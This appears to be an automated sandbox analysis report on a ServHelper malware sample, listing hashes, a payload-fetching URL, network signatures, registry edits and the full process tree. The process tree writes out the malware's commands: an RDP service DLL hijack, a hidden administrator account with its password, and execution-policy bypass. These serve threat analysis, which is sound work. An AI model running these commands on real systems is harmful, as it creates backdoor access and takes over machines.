Analysis
-
max time kernel
60s -
max time network
121s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
14-08-2021 06:42
Static task
static1
Behavioral task
behavioral1
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win10v20210408
General
-
Target
472208d7ba18d4c14b7e90b9db5d6feb.exe
-
Size
5.9MB
-
MD5
472208d7ba18d4c14b7e90b9db5d6feb
-
SHA1
ff24cc43998ff99e61b1a838e1d51c4888498935
-
SHA256
ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
-
SHA512
9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 2644 powershell.exe 19 2644 powershell.exe 20 2644 powershell.exe 21 2644 powershell.exe 23 2644 powershell.exe 25 2644 powershell.exe 27 2644 powershell.exe 29 2644 powershell.exe 31 2644 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2404 2404 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pvik2n51.1ly.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID084.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID162.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID182.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID103.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1uszuvw3.ucx.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID0F3.tmp powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4004 powershell.exe 4004 powershell.exe 4004 powershell.exe 3856 powershell.exe 3856 powershell.exe 3856 powershell.exe 2212 powershell.exe 2212 powershell.exe 2212 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 4004 powershell.exe 4004 powershell.exe 4004 powershell.exe 2644 powershell.exe 2644 powershell.exe 2644 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3728 472208d7ba18d4c14b7e90b9db5d6feb.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeIncreaseQuotaPrivilege 3856 powershell.exe Token: SeSecurityPrivilege 3856 powershell.exe Token: SeTakeOwnershipPrivilege 3856 powershell.exe Token: SeLoadDriverPrivilege 3856 powershell.exe Token: SeSystemProfilePrivilege 3856 powershell.exe Token: SeSystemtimePrivilege 3856 powershell.exe Token: SeProfSingleProcessPrivilege 3856 powershell.exe Token: SeIncBasePriorityPrivilege 3856 powershell.exe Token: SeCreatePagefilePrivilege 3856 powershell.exe Token: SeBackupPrivilege 3856 powershell.exe Token: SeRestorePrivilege 3856 powershell.exe Token: SeShutdownPrivilege 3856 powershell.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeSystemEnvironmentPrivilege 3856 powershell.exe Token: SeRemoteShutdownPrivilege 3856 powershell.exe Token: SeUndockPrivilege 3856 powershell.exe Token: SeManageVolumePrivilege 3856 powershell.exe Token: 33 3856 powershell.exe Token: 34 3856 powershell.exe Token: 35 3856 powershell.exe Token: 36 3856 powershell.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeIncreaseQuotaPrivilege 2212 powershell.exe Token: SeSecurityPrivilege 2212 powershell.exe Token: SeTakeOwnershipPrivilege 2212 powershell.exe Token: SeLoadDriverPrivilege 2212 powershell.exe Token: SeSystemProfilePrivilege 2212 powershell.exe Token: SeSystemtimePrivilege 2212 powershell.exe Token: SeProfSingleProcessPrivilege 2212 powershell.exe Token: SeIncBasePriorityPrivilege 2212 powershell.exe Token: SeCreatePagefilePrivilege 2212 powershell.exe Token: SeBackupPrivilege 2212 powershell.exe Token: SeRestorePrivilege 2212 powershell.exe Token: SeShutdownPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeSystemEnvironmentPrivilege 2212 powershell.exe Token: SeRemoteShutdownPrivilege 2212 powershell.exe Token: SeUndockPrivilege 2212 powershell.exe Token: SeManageVolumePrivilege 2212 powershell.exe Token: 33 2212 powershell.exe Token: 34 2212 powershell.exe Token: 35 2212 powershell.exe Token: 36 2212 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe Token: SeIncreaseQuotaPrivilege 1152 powershell.exe Token: SeSecurityPrivilege 1152 powershell.exe Token: SeTakeOwnershipPrivilege 1152 powershell.exe Token: SeLoadDriverPrivilege 1152 powershell.exe Token: SeSystemProfilePrivilege 1152 powershell.exe Token: SeSystemtimePrivilege 1152 powershell.exe Token: SeProfSingleProcessPrivilege 1152 powershell.exe Token: SeIncBasePriorityPrivilege 1152 powershell.exe Token: SeCreatePagefilePrivilege 1152 powershell.exe Token: SeBackupPrivilege 1152 powershell.exe Token: SeRestorePrivilege 1152 powershell.exe Token: SeShutdownPrivilege 1152 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe Token: SeSystemEnvironmentPrivilege 1152 powershell.exe Token: SeRemoteShutdownPrivilege 1152 powershell.exe Token: SeUndockPrivilege 1152 powershell.exe Token: SeManageVolumePrivilege 1152 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3728 wrote to memory of 4004 3728 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 3728 wrote to memory of 4004 3728 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 4004 wrote to memory of 2116 4004 powershell.exe csc.exe PID 4004 wrote to memory of 2116 4004 powershell.exe csc.exe PID 2116 wrote to memory of 2660 2116 csc.exe cvtres.exe PID 2116 wrote to memory of 2660 2116 csc.exe cvtres.exe PID 4004 wrote to memory of 3856 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 3856 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 2212 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 2212 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 1152 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 1152 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 1612 4004 powershell.exe reg.exe PID 4004 wrote to memory of 1612 4004 powershell.exe reg.exe PID 4004 wrote to memory of 2688 4004 powershell.exe reg.exe PID 4004 wrote to memory of 2688 4004 powershell.exe reg.exe PID 4004 wrote to memory of 3944 4004 powershell.exe reg.exe PID 4004 wrote to memory of 3944 4004 powershell.exe reg.exe PID 4004 wrote to memory of 2128 4004 powershell.exe net.exe PID 4004 wrote to memory of 2128 4004 powershell.exe net.exe PID 2128 wrote to memory of 1516 2128 net.exe net1.exe PID 2128 wrote to memory of 1516 2128 net.exe net1.exe PID 4004 wrote to memory of 1948 4004 powershell.exe cmd.exe PID 4004 wrote to memory of 1948 4004 powershell.exe cmd.exe PID 1948 wrote to memory of 580 1948 cmd.exe cmd.exe PID 1948 wrote to memory of 580 1948 cmd.exe cmd.exe PID 580 wrote to memory of 3868 580 cmd.exe net.exe PID 580 wrote to memory of 3868 580 cmd.exe net.exe PID 3868 wrote to memory of 968 3868 net.exe net1.exe PID 3868 wrote to memory of 968 3868 net.exe net1.exe PID 4004 wrote to memory of 2372 4004 powershell.exe cmd.exe PID 4004 wrote to memory of 2372 4004 powershell.exe cmd.exe PID 2372 wrote to memory of 1768 2372 cmd.exe cmd.exe PID 2372 wrote to memory of 1768 2372 cmd.exe cmd.exe PID 1768 wrote to memory of 2448 1768 cmd.exe net.exe PID 1768 wrote to memory of 2448 1768 cmd.exe net.exe PID 2448 wrote to memory of 1264 2448 net.exe net1.exe PID 2448 wrote to memory of 1264 2448 net.exe net1.exe PID 2312 wrote to memory of 2848 2312 cmd.exe net.exe PID 2312 wrote to memory of 2848 2312 cmd.exe net.exe PID 2848 wrote to memory of 2288 2848 net.exe net1.exe PID 2848 wrote to memory of 2288 2848 net.exe net1.exe PID 4012 wrote to memory of 3856 4012 cmd.exe net.exe PID 4012 wrote to memory of 3856 4012 cmd.exe net.exe PID 3856 wrote to memory of 2004 3856 net.exe net1.exe PID 3856 wrote to memory of 2004 3856 net.exe net1.exe PID 1096 wrote to memory of 580 1096 cmd.exe net.exe PID 1096 wrote to memory of 580 1096 cmd.exe net.exe PID 580 wrote to memory of 2112 580 net.exe net1.exe PID 580 wrote to memory of 2112 580 net.exe net1.exe PID 2676 wrote to memory of 2084 2676 cmd.exe net.exe PID 2676 wrote to memory of 2084 2676 cmd.exe net.exe PID 2084 wrote to memory of 3780 2084 net.exe net1.exe PID 2084 wrote to memory of 3780 2084 net.exe net1.exe PID 2312 wrote to memory of 2656 2312 cmd.exe net.exe PID 2312 wrote to memory of 2656 2312 cmd.exe net.exe PID 2656 wrote to memory of 2004 2656 net.exe net1.exe PID 2656 wrote to memory of 2004 2656 net.exe net1.exe PID 2548 wrote to memory of 1948 2548 cmd.exe net.exe PID 2548 wrote to memory of 1948 2548 cmd.exe net.exe PID 1948 wrote to memory of 2672 1948 net.exe net1.exe PID 1948 wrote to memory of 2672 1948 net.exe net1.exe PID 3240 wrote to memory of 2676 3240 cmd.exe WMIC.exe PID 3240 wrote to memory of 2676 3240 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\upn5lb25\upn5lb25.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7862.tmp" "c:\Users\Admin\AppData\Local\Temp\upn5lb25\CSC3921219BA57B4BDFB8B9BD17D4357878.TMP"4⤵PID:2660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1612
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2688 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3944
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1516
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:968
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1264
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2688
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1612
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:2288
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc udj4QYwQ /add1⤵
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc udj4QYwQ /add2⤵
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc udj4QYwQ /add3⤵PID:2004
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2112
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:3780
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2004
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc udj4QYwQ1⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc udj4QYwQ2⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc udj4QYwQ3⤵PID:2672
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:2676
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1480
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:2288
-
